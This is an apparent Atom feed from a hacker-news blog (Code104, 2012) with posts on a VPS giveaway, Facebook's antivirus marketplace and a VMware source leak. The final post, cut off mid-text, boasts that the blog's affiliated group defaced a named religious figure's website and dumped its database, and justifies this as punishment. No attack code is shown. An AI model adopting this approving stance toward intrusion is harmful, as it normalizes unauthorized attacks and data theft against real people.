<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-2826169767096655436</id><updated>2024-11-08T06:57:00.640-08:00</updated><category term="Cyber News"/><category term="News"/><category term="Hacker News"/><category term="defacement"/><category term="Hackers"/><category term="Security News"/><category term="Defacements"/><category term="featured"/><category term="Tips and Tricks"/><category term="hacks"/><category term="Vulnerability"/><category term="Downloads"/><category term="Tools"/><category term="internet tips and tricks"/><category term="full softwares"/><category term="Indian Hackers"/><category term="Technology"/><category term="pc tips and tricks"/><category term="Anonymous Hackers"/><category term="os hacks"/><category term="Cyber-Crime"/><category term="Pakistani Hackers"/><category term="Website Hacking"/><category term="facebook hacks"/><category term="email hacks"/><category term="mobile tips and tricks"/><category term="League of Assasins"/><category term="Database Exposed"/><category term="Indian Cyber Army"/><category term="Anonymous"/><category term="Hacker"/><category term="Facebook"/><category term="Antisec"/><category term="android tips and tricks"/><category term="IndiShell"/><category term="Lulzsec"/><category term="E-Books"/><category term="Google"/><category term="Team Grey Hat"/><category term="XSS"/><category term="Hacking"/><category term="Twitter"/><category term="symbian tips and tricks"/><category term="Bangladeshi Hackers"/><category term="DDoS Attack"/><category term="Iranian Hackers"/><category term="Server Root"/><category term="Spam Report"/><category term="Making website"/><category term="Microsoft"/><category term="Pakistan Cyber Army"/><category term="Saudi Hackers"/><category term="Top 10"/><category term="Weekly Magazine"/><category term="Yahoo"/><category term="how to make website"/><category term="trial softwares"/><category term="Algerian Hackers"/><category term="ClickJacking"/><category term="Indonasian Hackers"/><category term="Jordan Hackers"/><category term="Malware Report"/><category term="NBC Hacked"/><category term="Russian Hackers"/><category term="SEO Tips"/><category term="Social Network"/><category term="Sony"/><category term="Spyfiles"/><category term="Trick"/><category term="Twiiter"/><category term="Twiiter Hacking"/><category term="Wikileaks"/><category term="alexa"/><category term="code104"/><category term="forum"/><category term="giveaway"/><category term="hosting"/><category term="link exchange"/><category term="vps"/><title type='text'>Code104 News</title><subtitle type='html'>Be Updated with our Hacker News</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://code104.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default?start-index=26&amp;max-results=25'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>703</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-6463711928936170921</id><published>2012-07-02T22:23:00.000-07:00</published><updated>2012-07-02T22:23:05.358-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="code104"/><category scheme="http://www.blogger.com/atom/ns#" term="forum"/><category scheme="http://www.blogger.com/atom/ns#" term="League of Assasins"/><category scheme="http://www.blogger.com/atom/ns#" term="link exchange"/><title type='text'>Link Exchange with our Forum |  Code104.net</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div style=&quot;text-align: center;&quot;&gt;Our Forum - http://code104.net/&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;For Link Exchange E-mail us @ &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;news.code104@gmail.com&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;Thank your for your interest.. &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/6463711928936170921/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/07/link-exchange-with-our-forum-code104net.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/6463711928936170921'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/6463711928936170921'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/07/link-exchange-with-our-forum-code104net.html' title='Link Exchange with our Forum |  Code104.net'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-1865184119205291230</id><published>2012-05-15T01:59:00.001-07:00</published><updated>2012-05-15T02:02:28.209-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="giveaway"/><category scheme="http://www.blogger.com/atom/ns#" term="hosting"/><category scheme="http://www.blogger.com/atom/ns#" term="vps"/><title type='text'>[Giveaway] Get a Free Cloud VPS Hosting with root user! [Valid till 30th of May]</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://secure.vpsport.com/images/vps-hosting.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://secure.vpsport.com/images/vps-hosting.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We are noticing that many people run their websites on free virtual servers with limited resources ! Code104 contributed for all of our visitors and we are finally giving away free VPS &lt;b&gt;with root user&lt;/b&gt; to our lucky winner ;)&lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
&lt;u&gt;&lt;b&gt;Below are some specs of VPS :- &lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
Disk Space- 10GB&lt;br /&gt;
Bandwidth- Unlimited&lt;br /&gt;
Ram- 128MB&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;Below are the Steps to get this VPS for free:-&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
1) Share this blog post on facebook !&lt;br /&gt;
2) Tweet about this blog post on twitter !&lt;br /&gt;
3) Comment below with link of your tweets and shares !&lt;br /&gt;
&lt;br /&gt;
That&#39;s it ! We will randomly choose our lucky winner who will get a free VPS hosting !&lt;br /&gt;
Note: You can participate in this giveaway till 30th of may. Our Lucky winner will be declared on 1st of June !&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b style=&quot;color: red;&quot;&gt;~Best of Luck From team Code104&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/1865184119205291230/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/05/giveaway-get-free-cloud-vps-hosting.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/1865184119205291230'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/1865184119205291230'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/05/giveaway-get-free-cloud-vps-hosting.html' title='[Giveaway] Get a Free Cloud VPS Hosting with root user! [Valid till 30th of May]'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-4918113532175453933</id><published>2012-04-25T20:13:00.000-07:00</published><updated>2012-04-25T20:13:08.103-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="Downloads"/><category scheme="http://www.blogger.com/atom/ns#" term="Facebook"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Security News"/><category scheme="http://www.blogger.com/atom/ns#" term="Tools"/><title type='text'>Facebook Offers free Antivirus Service to protect their users at AV Market Place</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTW8tk-91zK12sAF-1mdTYrbUGfnu4iUxUSrRjdb8l22BswI-K97NPdRMcqAO1BqrVFF-ENyzuakWUYqev7pw0QpXhsH_8N1bJQZwoVEYt96Fg-dLiLyNtGumtWJLklK9q7xuHjXkDoIxR/s1600/FacebookSecurity-antivirus-marketplace.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;233&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTW8tk-91zK12sAF-1mdTYrbUGfnu4iUxUSrRjdb8l22BswI-K97NPdRMcqAO1BqrVFF-ENyzuakWUYqev7pw0QpXhsH_8N1bJQZwoVEYt96Fg-dLiLyNtGumtWJLklK9q7xuHjXkDoIxR/s320/FacebookSecurity-antivirus-marketplace.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;The social networking giant, Facebook announced its partnership with a number of security vendors to protect its users from spam and malicious content.&lt;br /&gt;
&lt;br /&gt;
Facebook teams up with Microsoft, McAfee, TrendMicro, Sophos, and Symantec and launched the Antivirus Marketplace where facebook users can download Antivirus softwares for free.&lt;br /&gt;
&lt;br /&gt;
The Antivirus Marketplace offers the following software for download: &lt;b&gt;McAfee Internet Security&lt;/b&gt; (PC), &lt;b&gt;Microsoft Security Essentials&lt;/b&gt; (PC), &lt;b&gt;Norton Antivirus &lt;/b&gt;(PC and Mac), &lt;b&gt;Trend Micro&lt;/b&gt; (PC and Mac), and &lt;b&gt;Sophos Antivirus &lt;/b&gt;(Mac). Six months of free updates are included with each download, but users are limited to just one free antivirus application per Facebook account.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Download your favorite Antivirus&lt;/b&gt; software for free of cost from here:&lt;br /&gt;
&lt;a href=&quot;http://on.fb.me/FBAVMarketplace&quot;&gt;http://on.fb.me/FBAVMarketplace&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
We are thankful to Facebook for providing protection against spam and malwares.&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/4918113532175453933/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/04/facebook-offers-free-antivirus-service.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/4918113532175453933'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/4918113532175453933'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/04/facebook-offers-free-antivirus-service.html' title='Facebook Offers free Antivirus Service to protect their users at AV Market Place'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTW8tk-91zK12sAF-1mdTYrbUGfnu4iUxUSrRjdb8l22BswI-K97NPdRMcqAO1BqrVFF-ENyzuakWUYqev7pw0QpXhsH_8N1bJQZwoVEYt96Fg-dLiLyNtGumtWJLklK9q7xuHjXkDoIxR/s72-c/FacebookSecurity-antivirus-marketplace.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-2166306362688219627</id><published>2012-04-25T01:35:00.000-07:00</published><updated>2012-04-25T01:35:20.796-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Anonymous"/><category scheme="http://www.blogger.com/atom/ns#" term="Anonymous Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker News"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Security News"/><title type='text'>VMWare Source Code Leaked by Anonymous Hackers</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjTb7a-NEmp_1TGWcnHFP9btMzcYdUA5M4FLmnjkXoWjtvjgn-Ky1TbFgYJ-XOOaoTJDSO59jXTj7UjNyrrurXdfGHZ7NT8Q5r3BkEFjPCtNMzlZ9N03z_VSuFlWQWDAQq8c9XnQmbcejU/s400/VMWare+Source+Code+leaked+by+Anonymous+Hackers.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjTb7a-NEmp_1TGWcnHFP9btMzcYdUA5M4FLmnjkXoWjtvjgn-Ky1TbFgYJ-XOOaoTJDSO59jXTj7UjNyrrurXdfGHZ7NT8Q5r3BkEFjPCtNMzlZ9N03z_VSuFlWQWDAQq8c9XnQmbcejU/s320/VMWare+Source+Code+leaked+by+Anonymous+Hackers.jpg&quot; width=&quot;318&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div id=&quot;aim12797445896653929396&quot; style=&quot;background-color: white; color: #555555; font-family: Arial, Tahoma, &#39;Century gothic&#39;, sans-serif; font-size: 13px; line-height: 24px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot; trbidi=&quot;on&quot;&gt;&lt;div dir=&quot;ltr&quot; style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot; trbidi=&quot;on&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;&quot;&gt;VMware on Tuesday announced that a single file from its ESX server hypervisor source code has been posted online, and it held out the possibility that more proprietary files could be leaked in the future.&amp;nbsp;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;&quot;&gt;&quot;&lt;/span&gt;&lt;i style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;&quot;&gt;&lt;span style=&quot;color: #990000; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;The fact that the source code may have been publicly shared does not necessarily mean that there is any increased risk to VMware customers&lt;/span&gt;&lt;/i&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;&quot;&gt;,&quot; VMware said in a statement.&lt;/span&gt;&lt;br style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot; /&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;&quot;&gt;&lt;br style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;&quot;&gt;&quot;&lt;b style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;Hardcore Charlie&lt;/b&gt;&quot; - who claims to have downloaded some 300 Megabytes of VMWare source code.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;br style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot; /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;&quot;&gt;&lt;b style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;Anonymous tweeted:&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;&quot;&gt;@AnonymousIRC:&amp;nbsp;&lt;i style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;color: #990000; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;Oops, VMWare source leaked? Not good&amp;nbsp;&lt;a href=&quot;http://pastebin.com/JGxdK6vw&quot; rel=&quot;follow&quot; style=&quot;color: #034e9d; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;&quot;&gt;http://pastebin.com/JGxdK6vw&lt;/a&gt;&amp;nbsp;to Anonymous contributors. May the Pirate Bay always sail strong!&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;&quot;&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id=&quot;aim22797445896653929396&quot; style=&quot;background-color: white; color: #555555; font-family: Arial, Tahoma, &#39;Century gothic&#39;, sans-serif; font-size: 13px; line-height: 24px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;&quot;&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;The leaked documents include what appear to be internal VMWare communications, pasted onto CEIEC letterhead and with official looking stamps. One email exchange, dated June 5, 2003 is from Jeffrey Sheldon to an internal VMWare listserv and has the subject &quot;code review:untruncating segments.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;br style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;Given the large number of service providers that run vSphere, security issues in ESX could potentially have a broad and widespread impact, according to security researchers.&amp;nbsp;VMware says it is looking into the matter and will be canvassing its industry partners and developers in order to determine the source of the breach.&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/2166306362688219627/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/04/vmware-source-code-leaked-by-anonymous.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/2166306362688219627'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/2166306362688219627'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/04/vmware-source-code-leaked-by-anonymous.html' title='VMWare Source Code Leaked by Anonymous Hackers'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjTb7a-NEmp_1TGWcnHFP9btMzcYdUA5M4FLmnjkXoWjtvjgn-Ky1TbFgYJ-XOOaoTJDSO59jXTj7UjNyrrurXdfGHZ7NT8Q5r3BkEFjPCtNMzlZ9N03z_VSuFlWQWDAQq8c9XnQmbcejU/s72-c/VMWare+Source+Code+leaked+by+Anonymous+Hackers.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-3179169574262190884</id><published>2012-04-24T07:27:00.000-07:00</published><updated>2012-04-24T07:27:02.458-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="Defacements"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker News"/><category scheme="http://www.blogger.com/atom/ns#" term="Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="League of Assasins"/><title type='text'>Nirmal Baba&#39;s Website Hacked by League of Assassins [Code104]</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFhwT2ILt9UDJHu_9t4PY8ukJgqu3SOiB9KIYjdkkc1iYp5l9QXizM5FrNHKfFA-9b4QhWB5LV_qBFpYBFf9UyNP1n5rhLIy41MqgPYR9-NLpw90EfLNGwAApEUh97la_gLBWfjjjz-1o9/s1600/104.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;175&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFhwT2ILt9UDJHu_9t4PY8ukJgqu3SOiB9KIYjdkkc1iYp5l9QXizM5FrNHKfFA-9b4QhWB5LV_qBFpYBFf9UyNP1n5rhLIy41MqgPYR9-NLpw90EfLNGwAApEUh97la_gLBWfjjjz-1o9/s400/104.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;We haven&#39;t posted any news on our blog for a long time, Blog was also down due to some problems faced by the members of Code104,&amp;nbsp;inconvenience&amp;nbsp;is regretted !&lt;/blockquote&gt;&lt;br /&gt;
Today Dark knights The Black Hat Souls aka League of Assassins Hacked biggest Indian fraud known as Nirmal Baba, Website got defaced and database is dumped ! Hackers from League of Assassins [Code104] also mention that Nirmal Baba&#39;s website is only hacked due to misguiding innocent people and making fool of them !&lt;br /&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;u&gt;&lt;b&gt;Below are the details of this hack:&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;u style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;&lt;br /&gt;
Defaced Page:&lt;/b&gt;&lt;/u&gt;&lt;b style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;u&gt;&lt;a href=&quot;http://nirmalbaba.me/volunteer/admin/admin/volunimage.php?id=4443&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://nirmalbaba.me/volunteer/admin/admin/volunimage.php?id=4443&lt;/a&gt;&lt;/u&gt;&lt;/b&gt;&lt;b style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;u&gt;&lt;br /&gt;
Cause Of This Hack:Misguiding Innocent People and making fool of them !&lt;br /&gt;
&lt;br /&gt;
